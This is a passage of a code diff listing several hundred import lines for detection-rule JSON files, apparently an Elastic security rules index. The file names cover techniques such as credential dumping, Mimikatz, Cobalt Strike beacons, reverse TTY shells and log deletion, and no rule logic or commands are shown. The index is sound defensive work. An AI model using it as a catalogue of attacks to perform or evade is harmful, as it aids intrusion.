'./defense_evasion_injection_msbuild.json'; -import rule99 from './ml_linux_anomalous_network_activity.json'; -import rule100 from './ml_linux_anomalous_network_port_activity.json'; -import rule101 from './ml_linux_anomalous_process_all_hosts.json'; -import rule102 from './ml_linux_anomalous_user_name.json'; -import rule103 from './ml_packetbeat_dns_tunneling.json'; -import rule104 from './ml_packetbeat_rare_dns_question.json'; -import rule105 from './ml_packetbeat_rare_server_domain.json'; -import rule106 from './ml_packetbeat_rare_urls.json'; -import rule107 from './ml_packetbeat_rare_user_agent.json'; -import rule108 from './ml_rare_process_by_host_linux.json'; -import rule109 from './ml_rare_process_by_host_windows.json'; -import rule110 from './ml_suspicious_login_activity.json'; -import rule111 from './ml_windows_anomalous_network_activity.json'; -import rule112 from './ml_windows_anomalous_path_activity.json'; -import rule113 from './ml_windows_anomalous_process_all_hosts.json'; -import rule114 from './ml_windows_anomalous_process_creation.json'; -import rule115 from './ml_windows_anomalous_script.json'; -import rule116 from './ml_windows_anomalous_service.json'; -import rule117 from './ml_windows_anomalous_user_name.json'; -import rule118 from './ml_windows_rare_user_runas_event.json'; -import rule119 from './ml_windows_rare_user_type10_remote_login.json'; -import rule120 from './execution_suspicious_pdf_reader.json'; -import rule121 from './privilege_escalation_sudoers_file_mod.json'; -import rule122 from './defense_evasion_iis_httplogging_disabled.json'; -import rule123 from './execution_python_tty_shell.json'; -import rule124 from './execution_perl_tty_shell.json'; -import rule125 from './defense_evasion_base16_or_base32_encoding_or_decoding_activity.json'; -import rule126 from './defense_evasion_file_mod_writable_dir.json'; -import rule127 from './defense_evasion_disable_selinux_attempt.json'; -import rule128 from 
'./discovery_kernel_module_enumeration.json'; -import rule129 from './lateral_movement_telnet_network_activity_external.json'; -import rule130 from './lateral_movement_telnet_network_activity_internal.json'; -import rule131 from './privilege_escalation_setuid_setgid_bit_set_via_chmod.json'; -import rule132 from './defense_evasion_attempt_to_disable_iptables_or_firewall.json'; -import rule133 from './defense_evasion_kernel_module_removal.json'; -import rule134 from './defense_evasion_attempt_to_disable_syslog_service.json'; -import rule135 from './defense_evasion_file_deletion_via_shred.json'; -import rule136 from './discovery_virtual_machine_fingerprinting.json'; -import rule137 from './defense_evasion_hidden_file_dir_tmp.json'; -import rule138 from './defense_evasion_deletion_of_bash_command_line_history.json'; -import rule139 from './impact_cloudwatch_log_group_deletion.json'; -import rule140 from './impact_cloudwatch_log_stream_deletion.json'; -import rule141 from './impact_rds_instance_cluster_stoppage.json'; -import rule142 from './persistence_attempt_to_deactivate_mfa_for_okta_user_account.json'; -import rule143 from './persistence_rds_cluster_creation.json'; -import rule144 from './credential_access_attempted_bypass_of_okta_mfa.json'; -import rule145 from './defense_evasion_waf_acl_deletion.json'; -import rule146 from './impact_attempt_to_revoke_okta_api_token.json'; -import rule147 from './impact_iam_group_deletion.json'; -import rule148 from './impact_possible_okta_dos_attack.json'; -import rule149 from './impact_rds_instance_cluster_deletion.json'; -import rule150 from './initial_access_suspicious_activity_reported_by_okta_user.json'; -import rule151 from './okta_attempt_to_deactivate_okta_policy.json'; -import rule152 from './okta_attempt_to_deactivate_okta_policy_rule.json'; -import rule153 from './okta_attempt_to_modify_okta_network_zone.json'; -import rule154 from './okta_attempt_to_modify_okta_policy.json'; -import rule155 from 
'./okta_attempt_to_modify_okta_policy_rule.json'; -import rule156 from './okta_threat_detected_by_okta_threatinsight.json'; -import rule157 from './persistence_administrator_privileges_assigned_to_okta_group.json'; -import rule158 from './persistence_attempt_to_create_okta_api_token.json'; -import rule159 from './persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json'; -import rule160 from './defense_evasion_cloudtrail_logging_deleted.json'; -import rule161 from './defense_evasion_ec2_network_acl_deletion.json'; -import rule162 from './impact_iam_deactivate_mfa_device.json'; -import rule163 from './defense_evasion_s3_bucket_configuration_deletion.json'; -import rule164 from './defense_evasion_guardduty_detector_deletion.json'; -import rule165 from './okta_attempt_to_delete_okta_policy.json'; -import rule166 from './credential_access_iam_user_addition_to_group.json'; -import rule167 from './persistence_ec2_network_acl_creation.json'; -import rule168 from './impact_ec2_disable_ebs_encryption.json'; -import rule169 from './persistence_iam_group_creation.json'; -import rule170 from './defense_evasion_waf_rule_or_rule_group_deletion.json'; -import rule171 from './collection_cloudtrail_logging_created.json'; -import rule172 from './defense_evasion_cloudtrail_logging_suspended.json'; -import rule173 from './impact_cloudtrail_logging_updated.json'; -import rule174 from './initial_access_console_login_root.json'; -import rule175 from './defense_evasion_cloudwatch_alarm_deletion.json'; -import rule176 from './defense_evasion_ec2_flow_log_deletion.json'; -import rule177 from './defense_evasion_configuration_recorder_stopped.json'; -import rule178 from './exfiltration_ec2_snapshot_change_activity.json'; -import rule179 from './defense_evasion_config_service_rule_deletion.json'; -import rule180 from './okta_attempt_to_modify_or_delete_application_sign_on_policy.json'; -import rule181 from './command_and_control_download_rar_powershell_from_internet.json'; -import 
rule182 from './initial_access_password_recovery.json'; -import rule183 from './command_and_control_cobalt_strike_beacon.json'; -import rule184 from './command_and_control_fin7_c2_behavior.json'; -import rule185 from './command_and_control_halfbaked_beacon.json'; -import rule186 from './credential_access_secretsmanager_getsecretvalue.json'; -import rule187 from './initial_access_via_system_manager.json'; -import rule188 from './privilege_escalation_root_login_without_mfa.json'; -import rule189 from './privilege_escalation_updateassumerolepolicy.json'; -import rule190 from './impact_hosts_file_modified.json'; -import rule191 from './elastic_endpoint_security.json'; -import rule192 from './external_alerts.json'; -import rule193 from './initial_access_login_failures.json'; -import rule194 from './initial_access_login_location.json'; -import rule195 from './initial_access_login_sessions.json'; -import rule196 from './initial_access_login_time.json'; -import rule197 from './ml_cloudtrail_error_message_spike.json'; -import rule198 from './ml_cloudtrail_rare_error_code.json'; -import rule199 from './ml_cloudtrail_rare_method_by_city.json'; -import rule200 from './ml_cloudtrail_rare_method_by_country.json'; -import rule201 from './ml_cloudtrail_rare_method_by_user.json'; -import rule202 from './credential_access_aws_iam_assume_role_brute_force.json'; -import rule203 from './credential_access_okta_brute_force_or_password_spraying.json'; -import rule204 from './initial_access_unusual_dns_service_children.json'; -import rule205 from './initial_access_unusual_dns_service_file_writes.json'; -import rule206 from './lateral_movement_dns_server_overflow.json'; -import rule207 from './credential_access_root_console_failure_brute_force.json'; -import rule208 from './initial_access_unsecure_elasticsearch_node.json'; -import rule209 from './impact_virtual_network_device_modified.json'; -import rule210 from './credential_access_domain_backup_dpapi_private_keys.json'; -import rule211 
from './persistence_gpo_schtask_service_creation.json'; -import rule212 from './credential_access_credentials_keychains.json'; -import rule213 from './credential_access_kerberosdump_kcc.json'; -import rule214 from './defense_evasion_attempt_del_quarantine_attrib.json'; -import rule215 from './execution_suspicious_psexesvc.json'; -import rule216 from './execution_via_xp_cmdshell_mssql_stored_procedure.json'; -import rule217 from './privilege_escalation_printspooler_service_suspicious_file.json'; -import rule218 from './privilege_escalation_printspooler_suspicious_spl_file.json'; -import rule219 from './defense_evasion_azure_diagnostic_settings_deletion.json'; -import rule220 from './execution_command_virtual_machine.json'; -import rule221 from './execution_via_hidden_shell_conhost.json'; -import rule222 from './impact_resource_group_deletion.json'; -import rule223 from './persistence_via_telemetrycontroller_scheduledtask_hijack.json'; -import rule224 from './persistence_via_update_orchestrator_service_hijack.json'; -import rule225 from './collection_update_event_hub_auth_rule.json'; -import rule226 from './credential_access_iis_apppoolsa_pwd_appcmd.json'; -import rule227 from './credential_access_iis_connectionstrings_dumping.json'; -import rule228 from './defense_evasion_event_hub_deletion.json'; -import rule229 from './defense_evasion_firewall_policy_deletion.json'; -import rule230 from './defense_evasion_sdelete_like_filename_rename.json'; -import rule231 from './lateral_movement_remote_ssh_login_enabled.json'; -import rule232 from './persistence_azure_automation_account_created.json'; -import rule233 from './persistence_azure_automation_runbook_created_or_modified.json'; -import rule234 from './persistence_azure_automation_webhook_created.json'; -import rule235 from './privilege_escalation_uac_bypass_diskcleanup_hijack.json'; -import rule236 from './credential_access_attempts_to_brute_force_okta_user_account.json'; -import rule237 from 
'./credential_access_storage_account_key_regenerated.json'; -import rule238 from './defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json'; -import rule239 from './defense_evasion_system_critical_proc_abnormal_file_activity.json'; -import rule240 from './defense_evasion_unusual_system_vp_child_program.json'; -import rule241 from './discovery_blob_container_access_mod.json'; -import rule242 from './persistence_mfa_disabled_for_azure_user.json'; -import rule243 from './persistence_user_added_as_owner_for_azure_application.json'; -import rule244 from './persistence_user_added_as_owner_for_azure_service_principal.json'; -import rule245 from './defense_evasion_dotnet_compiler_parent_process.json'; -import rule246 from './defense_evasion_suspicious_managedcode_host_process.json'; -import rule247 from './execution_command_shell_started_by_unusual_process.json'; -import rule248 from './defense_evasion_masquerading_as_elastic_endpoint_process.json'; -import rule249 from './defense_evasion_masquerading_suspicious_werfault_childproc.json'; -import rule250 from './defense_evasion_masquerading_werfault.json'; -import rule251 from './credential_access_key_vault_modified.json'; -import rule252 from './credential_access_mimikatz_memssp_default_logs.json'; -import rule253 from './defense_evasion_code_injection_conhost.json'; -import rule254 from './defense_evasion_network_watcher_deletion.json'; -import rule255 from './initial_access_external_guest_user_invite.json'; -import rule256 from './defense_evasion_masquerading_renamed_autoit.json'; -import rule257 from './impact_azure_automation_runbook_deleted.json'; -import rule258 from './initial_access_consent_grant_attack_via_azure_registered_application.json'; -import rule259 from './persistence_azure_conditional_access_policy_modified.json'; -import rule260 from './persistence_azure_privileged_identity_management_role_modified.json'; -import rule261 from './command_and_control_teamviewer_remote_file_copy.json'; 
-import rule262 from './defense_evasion_installutil_beacon.json'; -import rule263 from './defense_evasion_mshta_beacon.json'; -import rule264 from './defense_evasion_network_connection_from_windows_binary.json'; -import rule265 from './defense_evasion_rundll32_no_arguments.json'; -import rule266 from './defense_evasion_suspicious_scrobj_load.json'; -import rule267 from './defense_evasion_suspicious_wmi_script.json'; -import rule268 from './execution_ms_office_written_file.json'; -import rule269 from './execution_pdf_written_file.json'; -import rule270 from './lateral_movement_cmd_service.json'; -import rule271 from './persistence_app_compat_shim.json'; -import rule272 from './command_and_control_remote_file_copy_desktopimgdownldr.json'; -import rule273 from './command_and_control_remote_file_copy_mpcmdrun.json'; -import rule274 from './defense_evasion_execution_suspicious_explorer_winword.json'; -import rule275 from './defense_evasion_suspicious_zoom_child_process.json'; -import rule276 from './ml_linux_anomalous_compiler_activity.json'; -import rule277 from './ml_linux_anomalous_sudo_activity.json'; -import rule278 from './ml_linux_system_information_discovery.json'; -import rule279 from './ml_linux_system_network_configuration_discovery.json'; -import rule280 from './ml_linux_system_network_connection_discovery.json'; -import rule281 from './ml_linux_system_process_discovery.json'; -import rule282 from './ml_linux_system_user_discovery.json'; -import rule283 from './discovery_post_exploitation_external_ip_lookup.json'; -import rule284 from './initial_access_zoom_meeting_with_no_passcode.json'; -import rule285 from './defense_evasion_gcp_logging_sink_deletion.json'; -import rule286 from './defense_evasion_gcp_pub_sub_topic_deletion.json'; -import rule287 from './defense_evasion_gcp_firewall_rule_created.json'; -import rule288 from './defense_evasion_gcp_firewall_rule_deleted.json'; -import rule289 from './defense_evasion_gcp_firewall_rule_modified.json'; -import 
rule290 from './defense_evasion_gcp_logging_bucket_deletion.json'; -import rule291 from './defense_evasion_gcp_storage_bucket_permissions_modified.json'; -import rule292 from './impact_gcp_storage_bucket_deleted.json'; -import rule293 from './initial_access_gcp_iam_custom_role_creation.json'; -import rule294 from './persistence_gcp_iam_service_account_key_deletion.json'; -import rule295 from './persistence_gcp_key_created_for_service_account.json'; -import rule296 from './defense_evasion_gcp_storage_bucket_configuration_modified.json'; -import rule297 from './exfiltration_gcp_logging_sink_modification.json'; -import rule298 from './impact_gcp_iam_role_deletion.json'; -import rule299 from './impact_gcp_service_account_deleted.json'; -import rule300 from './impact_gcp_service_account_disabled.json'; -import rule301 from './impact_gcp_virtual_private_cloud_network_deleted.json'; -import rule302 from './impact_gcp_virtual_private_cloud_route_created.json'; -import rule303 from './impact_gcp_virtual_private_cloud_route_deleted.json'; -import rule304 from './ml_linux_anomalous_metadata_process.json'; -import rule305 from './ml_linux_anomalous_metadata_user.json'; -import rule306 from './ml_windows_anomalous_metadata_process.json'; -import rule307 from './ml_windows_anomalous_metadata_user.json'; -import rule308 from './persistence_gcp_service_account_created.json'; -import rule309 from './collection_gcp_pub_sub_subscription_creation.json'; -import rule310 from './collection_gcp_pub_sub_topic_creation.json'; -import rule311 from './defense_evasion_gcp_pub_sub_subscription_deletion.json'; -import rule312 from './persistence_azure_pim_user_added_global_admin.json'; -import rule313 from './command_and_control_cobalt_strike_default_teamserver_cert.json'; -import rule314 from './defense_evasion_enable_inbound_rdp_with_netsh.json'; -import rule315 from './defense_evasion_execution_lolbas_wuauclt.json'; -import rule316 from 
'./privilege_escalation_unusual_svchost_childproc_childless.json'; -import rule317 from './command_and_control_rdp_tunnel_plink.json'; -import rule318 from './privilege_escalation_uac_bypass_winfw_mmc_hijack.json'; -import rule319 from './discovery_privileged_localgroup_membership.json'; -import rule320 from './persistence_ms_office_addins_file.json'; -import rule321 from './discovery_adfind_command_activity.json'; -import rule322 from './discovery_security_software_wmic.json'; -import rule323 from './execution_command_shell_via_rundll32.json'; -import rule324 from './execution_suspicious_cmd_wmi.json'; -import rule325 from './lateral_movement_via_startup_folder_rdp_smb.json'; -import rule326 from './privilege_escalation_uac_bypass_com_interface_icmluautil.json'; -import rule327 from './privilege_escalation_uac_bypass_mock_windir.json'; -import rule328 from './defense_evasion_potential_processherpaderping.json'; -import rule329 from './privilege_escalation_uac_bypass_dll_sideloading.json'; -import rule330 from './execution_shared_modules_local_sxs_dll.json'; -import rule331 from './privilege_escalation_uac_bypass_com_clipup.json'; -import rule332 from './initial_access_via_explorer_suspicious_child_parent_args.json'; -import rule333 from './execution_from_unusual_directory.json'; -import rule334 from './execution_from_unusual_path_cmdline.json'; -import rule335 from './credential_access_kerberoasting_unusual_process.json'; -import rule336 from './discovery_peripheral_device.json'; -import rule337 from './lateral_movement_mount_hidden_or_webdav_share_net.json'; -import rule338 from './defense_evasion_deleting_websvr_access_logs.json'; -import rule339 from './defense_evasion_log_files_deleted.json'; -import rule340 from './defense_evasion_timestomp_touch.json'; -import rule341 from './lateral_movement_dcom_hta.json'; -import rule342 from './lateral_movement_execution_via_file_shares_sequence.json'; -import rule343 from 
'./privilege_escalation_uac_bypass_com_ieinstal.json'; -import rule344 from './command_and_control_common_webservices.json'; -import rule345 from './command_and_control_encrypted_channel_freesslcert.json'; -import rule346 from './defense_evasion_process_termination_followed_by_deletion.json'; -import rule347 from './lateral_movement_remote_file_copy_hidden_share.json'; -import rule348 from './attempt_to_deactivate_okta_network_zone.json'; -import rule349 from './attempt_to_delete_okta_network_zone.json'; -import rule350 from './lateral_movement_dcom_mmc20.json'; -import rule351 from './lateral_movement_dcom_shellwindow_shellbrowserwindow.json'; -import rule352 from './okta_attempt_to_deactivate_okta_application.json'; -import rule353 from './okta_attempt_to_delete_okta_application.json'; -import rule354 from './okta_attempt_to_delete_okta_policy_rule.json'; -import rule355 from './okta_attempt_to_modify_okta_application.json'; -import rule356 from './persistence_administrator_role_assigned_to_okta_user.json'; -import rule357 from './lateral_movement_executable_tool_transfer_smb.json'; -import rule358 from './command_and_control_dns_tunneling_nslookup.json'; -import rule359 from './lateral_movement_execution_from_tsclient_mup.json'; -import rule360 from './lateral_movement_rdp_sharprdp_target.json'; -import rule361 from './defense_evasion_clearing_windows_security_logs.json'; -import rule362 from './persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json'; -import rule363 from './execution_suspicious_short_program_name.json'; -import rule364 from './lateral_movement_incoming_wmi.json'; -import rule365 from './persistence_via_hidden_run_key_valuename.json'; -import rule366 from './credential_access_potential_ssh_bruteforce.json'; -import rule367 from './credential_access_promt_for_pwd_via_osascript.json'; -import rule368 from './lateral_movement_remote_services.json'; -import rule369 from 
'./application_added_to_google_workspace_domain.json'; -import rule370 from './domain_added_to_google_workspace_trusted_domains.json'; -import rule371 from './execution_suspicious_image_load_wmi_ms_office.json'; -import rule372 from './execution_suspicious_powershell_imgload.json'; -import rule373 from './google_workspace_admin_role_deletion.json'; -import rule374 from './google_workspace_mfa_enforcement_disabled.json'; -import rule375 from './google_workspace_policy_modified.json'; -import rule376 from './mfa_disabled_for_google_workspace_organization.json'; -import rule377 from './persistence_evasion_registry_ifeo_injection.json'; -import rule378 from './persistence_google_workspace_admin_role_assigned_to_user.json'; -import rule379 from './persistence_google_workspace_custom_admin_role_created.json'; -import rule380 from './persistence_google_workspace_role_modified.json'; -import rule381 from './persistence_suspicious_image_load_scheduled_task_ms_office.json'; -import rule382 from './defense_evasion_masquerading_trusted_directory.json'; -import rule383 from './exfiltration_microsoft_365_exchange_transport_rule_creation.json'; -import rule384 from './initial_access_microsoft_365_exchange_safelinks_disabled.json'; -import rule385 from './microsoft_365_exchange_dkim_signing_config_disabled.json'; -import rule386 from './persistence_appcertdlls_registry.json'; -import rule387 from './persistence_appinitdlls_registry.json'; -import rule388 from './persistence_registry_uncommon.json'; -import rule389 from './persistence_run_key_and_startup_broad.json'; -import rule390 from './persistence_services_registry.json'; -import rule391 from './persistence_startup_folder_file_written_by_suspicious_process.json'; -import rule392 from './persistence_startup_folder_scripts.json'; -import rule393 from './persistence_suspicious_com_hijack_registry.json'; -import rule394 from './persistence_via_lsa_security_support_provider_registry.json'; -import rule395 from 
'./defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json'; -import rule396 from './defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json'; -import rule397 from './defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json'; -import rule398 from './exfiltration_microsoft_365_exchange_transport_rule_mod.json'; -import rule399 from './initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json'; -import rule400 from './initial_access_microsoft_365_exchange_anti_phish_rule_mod.json'; -import rule401 from './lateral_movement_suspicious_rdp_client_imageload.json'; -import rule402 from './persistence_runtime_run_key_startup_susp_procs.json'; -import rule403 from './persistence_suspicious_scheduled_task_runtime.json'; -import rule404 from './defense_evasion_microsoft_365_exchange_dlp_policy_removed.json'; -import rule405 from './lateral_movement_scheduled_task_target.json'; -import rule406 from './persistence_microsoft_365_exchange_management_role_assignment.json'; -import rule407 from './persistence_microsoft_365_teams_guest_access_enabled.json'; -import rule408 from './credential_access_dump_registry_hives.json'; -import rule409 from './defense_evasion_scheduledjobs_at_protocol_enabled.json'; -import rule410 from './persistence_ms_outlook_vba_template.json'; -import rule411 from './persistence_suspicious_service_created_registry.json'; -import rule412 from './privilege_escalation_named_pipe_impersonation.json'; -import rule413 from './credential_access_cmdline_dump_tool.json'; -import rule414 from './credential_access_copy_ntds_sam_volshadowcp_cmdline.json'; -import rule415 from './credential_access_lsass_memdump_file_created.json'; -import rule416 from './lateral_movement_incoming_winrm_shell_execution.json'; -import rule417 from './lateral_movement_powershell_remoting_target.json'; -import rule418 from './command_and_control_port_forwarding_added_registry.json'; -import rule419 from 
'./defense_evasion_hide_encoded_executable_registry.json';
-import rule420 from './lateral_movement_rdp_enabled_registry.json';
-import rule421 from './privilege_escalation_printspooler_registry_copyfiles.json';
-import rule422 from './privilege_escalation_rogue_windir_environment_var.json';
-import rule423 from './initial_access_scripts_process_started_via_wmi.json';
-import rule424 from './command_and_control_iexplore_via_com.json';
-import rule425 from './command_and_control_remote_file_copy_scripts.json';
-import rule426 from './persistence_local_scheduled_task_scripting.json';
-import rule427 from './persistence_startup_folder_file_written_by_unsigned_process.json';
-import rule428 from './command_and_control_remote_file_copy_powershell.json';
-import rule429 from './credential_access_microsoft_365_brute_force_user_account_attempt.json';
-import rule430 from './microsoft_365_teams_custom_app_interaction_allowed.json';
-import rule431 from './persistence_microsoft_365_teams_external_access_enabled.json';
-import rule432 from './credential_access_microsoft_365_potential_password_spraying_attack.json';
-import rule433 from './impact_stop_process_service_threshold.json';
-import rule434 from './collection_winrar_encryption.json';
-import rule435 from './defense_evasion_unusual_dir_ads.json';
-import rule436 from './discovery_admin_recon.json';
-import rule437 from './discovery_file_dir_discovery.json';
-import rule438 from './discovery_net_view.json';
-import rule439 from './discovery_remote_system_discovery_commands_windows.json';
-import rule440 from './persistence_via_windows_management_instrumentation_event_subscription.json';
-import rule441 from './credential_access_mimikatz_powershell_module.json';
-import rule442 from './execution_scripting_osascript_exec_followed_by_netcon.json';
-import rule443 from './execution_shell_execution_via_apple_scripting.json';
-import rule444 from './persistence_creation_change_launch_agents_file.json';
-import rule445 from './persistence_creation_modif_launch_deamon_sequence.json';
-import rule446 from './persistence_folder_action_scripts_runtime.json';
-import rule447 from './persistence_login_logout_hooks_defaults.json';
-import rule448 from './privilege_escalation_explicit_creds_via_scripting.json';
-import rule449 from './command_and_control_sunburst_c2_activity_detected.json';
-import rule450 from './defense_evasion_azure_application_credential_modification.json';
-import rule451 from './defense_evasion_azure_service_principal_addition.json';
-import rule452 from './defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json';
-import rule453 from './execution_apt_solarwinds_backdoor_child_cmd_powershell.json';
-import rule454 from './execution_apt_solarwinds_backdoor_unusual_child_processes.json';
-import rule455 from './initial_access_azure_active_directory_powershell_signin.json';
-import rule456 from './collection_email_powershell_exchange_mailbox.json';
-import rule457 from './execution_scheduled_task_powershell_source.json';
-import rule458 from './persistence_powershell_exch_mailbox_activesync_add_device.json';
-import rule459 from './persistence_docker_shortcuts_plist_modification.json';
-import rule460 from './persistence_evasion_hidden_local_account_creation.json';
-import rule461 from './persistence_finder_sync_plugin_pluginkit.json';
-import rule462 from './discovery_security_software_grep.json';
-import rule463 from './credential_access_cookies_chromium_browsers_debugging.json';
-import rule464 from './credential_access_ssh_backdoor_log.json';
-import rule465 from './persistence_credential_access_modify_auth_module_or_config.json';
-import rule466 from './persistence_credential_access_modify_ssh_binaries.json';
-import rule467 from './credential_access_collection_sensitive_files.json';
-import rule468 from './persistence_ssh_authorized_keys_modification.json';
-import rule469 from './defense_evasion_defender_disabled_via_registry.json';
-import rule470 from './defense_evasion_privacy_controls_tcc_database_modification.json';
-import rule471 from './execution_initial_access_suspicious_browser_childproc.json';
-import rule472 from './execution_script_via_automator_workflows.json';
-import rule473 from './persistence_modification_sublime_app_plugin_or_script.json';
-import rule474 from './privilege_escalation_applescript_with_admin_privs.json';
-import rule475 from './credential_access_dumping_keychain_security.json';
-import rule476 from './initial_access_azure_active_directory_high_risk_signin.json';
-import rule477 from './initial_access_suspicious_mac_ms_office_child_process.json';
-import rule478 from './credential_access_mitm_localhost_webproxy.json';
-import rule479 from './persistence_kde_autostart_modification.json';
-import rule480 from './persistence_user_account_added_to_privileged_group_ad.json';
-import rule481 from './defense_evasion_attempt_to_disable_gatekeeper.json';
-import rule482 from './defense_evasion_sandboxed_office_app_suspicious_zip_file.json';
-import rule483 from './persistence_emond_rules_file_creation.json';
-import rule484 from './persistence_emond_rules_process_execution.json';
-import rule485 from './discovery_users_domain_built_in_commands.json';
-import rule486 from './execution_pentest_eggshell_remote_admin_tool.json';
-import rule487 from './defense_evasion_install_root_certificate.json';
-import rule488 from './persistence_credential_access_authorization_plugin_creation.json';
-import rule489 from './persistence_directory_services_plugins_modification.json';
-import rule490 from './defense_evasion_modify_environment_launchctl.json';
-import rule491 from './defense_evasion_safari_config_change.json';
-import rule492 from './defense_evasion_apple_softupdates_modification.json';
-import rule493 from './credential_access_mod_wdigest_security_provider.json';
-import rule494 from './credential_access_saved_creds_vaultcmd.json';
-import rule495 from './defense_evasion_file_creation_mult_extension.json';
-import rule496 from './execution_enumeration_via_wmiprvse.json';
-import rule497 from './execution_suspicious_jar_child_process.json';
-import rule498 from './persistence_shell_profile_modification.json';
-import rule499 from './persistence_suspicious_calendar_modification.json';
-import rule500 from './persistence_time_provider_mod.json';
-import rule501 from './privilege_escalation_exploit_adobe_acrobat_updater.json';
-import rule502 from './defense_evasion_sip_provider_mod.json';
-import rule503 from './execution_com_object_xwizard.json';
-import rule504 from './privilege_escalation_disable_uac_registry.json';
-import rule505 from './defense_evasion_unusual_ads_file_creation.json';
-import rule506 from './persistence_loginwindow_plist_modification.json';
-import rule507 from './persistence_periodic_tasks_file_mdofiy.json';
-import rule508 from './persistence_via_atom_init_file_modification.json';
-import rule509 from './privilege_escalation_lsa_auth_package.json';
-import rule510 from './privilege_escalation_port_monitor_print_pocessor_abuse.json';
-import rule511 from './credential_access_dumping_hashes_bi_cmds.json';
-import rule512 from './lateral_movement_mounting_smb_share.json';
-import rule513 from './privilege_escalation_echo_nopasswd_sudoers.json';
-import rule514 from './privilege_escalation_ld_preload_shared_object_modif.json';
-import rule515 from './privilege_escalation_root_crontab_filemod.json';
-import rule516 from './defense_evasion_create_mod_root_certificate.json';
-import rule517 from './privilege_escalation_sudo_buffer_overflow.json';
-import rule518 from './execution_installer_spawned_network_event.json';
-import rule519 from './initial_access_suspicious_ms_exchange_files.json';
-import rule520 from './initial_access_suspicious_ms_exchange_process.json';
-import rule521 from './initial_access_suspicious_ms_exchange_worker_child_process.json';
-import rule522 from './persistence_evasion_registry_startup_shell_folder_modified.json';
-import rule523 from './persistence_local_scheduled_job_creation.json';
-import rule524 from './persistence_via_wmi_stdregprov_run_services.json';
-import rule525 from './credential_access_persistence_network_logon_provider_modification.json';
-import rule526 from './lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json';
-import rule527 from './collection_microsoft_365_new_inbox_rule.json';
-import rule528 from './ml_high_count_network_denies.json';
-import rule529 from './ml_high_count_network_events.json';
-import rule530 from './ml_rare_destination_country.json';
-import rule531 from './ml_spike_in_traffic_to_a_country.json';
-import rule532 from './command_and_control_tunneling_via_earthworm.json';
-import rule533 from './lateral_movement_evasion_rdp_shadowing.json';
-import rule534 from './threat_intel_fleet_integrations.json';
-import rule535 from './exfiltration_ec2_vm_export_failure.json';
-import rule536 from './exfiltration_ec2_full_network_packet_capture_detected.json';
-import rule537 from './impact_azure_service_principal_credentials_added.json';
-import rule538 from './persistence_ec2_security_group_configuration_change_detection.json';
-import rule539 from './defense_evasion_disabling_windows_logs.json';
-import rule540 from './persistence_route_53_domain_transfer_lock_disabled.json';
-import rule541 from './persistence_route_53_domain_transferred_to_another_account.json';
-import rule542 from './initial_access_okta_user_attempted_unauthorized_access.json';
-import rule543 from './credential_access_user_excessive_sso_logon_errors.json';
-import rule544 from './persistence_exchange_suspicious_mailbox_right_delegation.json';
-import rule545 from './privilege_escalation_new_or_modified_federation_domain.json';
-import rule546 from './privilege_escalation_sts_assumerole_usage.json';
-import rule547 from './privilege_escalation_sts_getsessiontoken_abuse.json';
-import rule548 from './defense_evasion_suspicious_execution_from_mounted_device.json';
-import rule549 from './defense_evasion_unusual_network_connection_via_dllhost.json';
-import rule550 from './defense_evasion_amsienable_key_mod.json';
-import rule551 from './impact_rds_group_deletion.json';
-import rule552 from './persistence_rds_group_creation.json';
-import rule553 from './persistence_route_table_created.json';
-import rule554 from './persistence_route_table_modified_or_deleted.json';
-import rule555 from './exfiltration_rds_snapshot_export.json';
-import rule556 from './persistence_rds_instance_creation.json';
-import rule557 from './privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json';
-import rule558 from './ml_auth_rare_hour_for_a_user_to_logon.json';
-import rule559 from './ml_auth_rare_source_ip_for_a_user.json';
-import rule560 from './ml_auth_rare_user_logon.json';
-import rule561 from './ml_auth_spike_in_failed_logon_events.json';
-import rule562 from './ml_auth_spike_in_logon_events.json';
-import rule563 from './ml_auth_spike_in_logon_events_from_a_source_ip.json';
-import rule564 from './privilege_escalation_cyberarkpas_error_audit_event_promotion.json';
-import rule565 from './privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json';
-import rule566 from './defense_evasion_kubernetes_events_deleted.json';
-import rule567 from './impact_kubernetes_pod_deleted.json';
-import rule568 from './exfiltration_rds_snapshot_restored.json';
-import rule569 from './privilege_escalation_printspooler_suspicious_file_deletion.json';
-import rule570 from './privilege_escalation_unusual_printspooler_childprocess.json';
-import rule571 from './defense_evasion_disabling_windows_defender_powershell.json';
-import rule572 from './defense_evasion_enable_network_discovery_with_netsh.json';
-import rule573 from './defense_evasion_execution_windefend_unusual_path.json';
-import rule574 from './defense_evasion_agent_spoofing_mismatched_id.json';
-import rule575 from './defense_evasion_agent_spoofing_multiple_hosts.json';
-import rule576 from './defense_evasion_parent_process_pid_spoofing.json';
-import rule577 from './impact_microsoft_365_potential_ransomware_activity.json';
-import rule578 from './impact_microsoft_365_unusual_volume_of_file_deletion.json';
-import rule579 from './initial_access_microsoft_365_user_restricted_from_sending_email.json';
-import rule580 from './defense_evasion_elasticache_security_group_creation.json';
-import rule581 from './defense_evasion_elasticache_security_group_modified_or_deleted.json';
-import rule582 from './impact_volume_shadow_copy_deletion_via_powershell.json';
-import rule583 from './persistence_route_53_hosted_zone_associated_with_a_vpc.json';
-import rule584 from './defense_evasion_defender_exclusion_via_powershell.json';
-import rule585 from './defense_evasion_dns_over_https_enabled.json';
-import rule586 from './defense_evasion_whitespace_padding_in_command_line.json';
-import rule587 from './defense_evasion_frontdoor_firewall_policy_deletion.json';
-import rule588 from './credential_access_azure_full_network_packet_capture_detected.json';
-import rule589 from './persistence_webshell_detection.json';
-import rule590 from './defense_evasion_suppression_rule_created.json';
-import rule591 from './impact_efs_filesystem_or_mount_deleted.json';
-import rule592 from './defense_evasion_execution_control_panel_suspicious_args.json';
-import rule593 from './defense_evasion_azure_blob_permissions_modified.json';
-import rule594 from './privilege_escalation_aws_suspicious_saml_activity.json';
-import rule595 from './credential_access_potential_lsa_memdump_via_mirrordump.json';
-import rule596 from './discovery_virtual_machine_fingerprinting_grep.json';
-import rule597 from './impact_backup_file_deletion.json';
-import rule598 from './credential_access_posh_minidump.json';
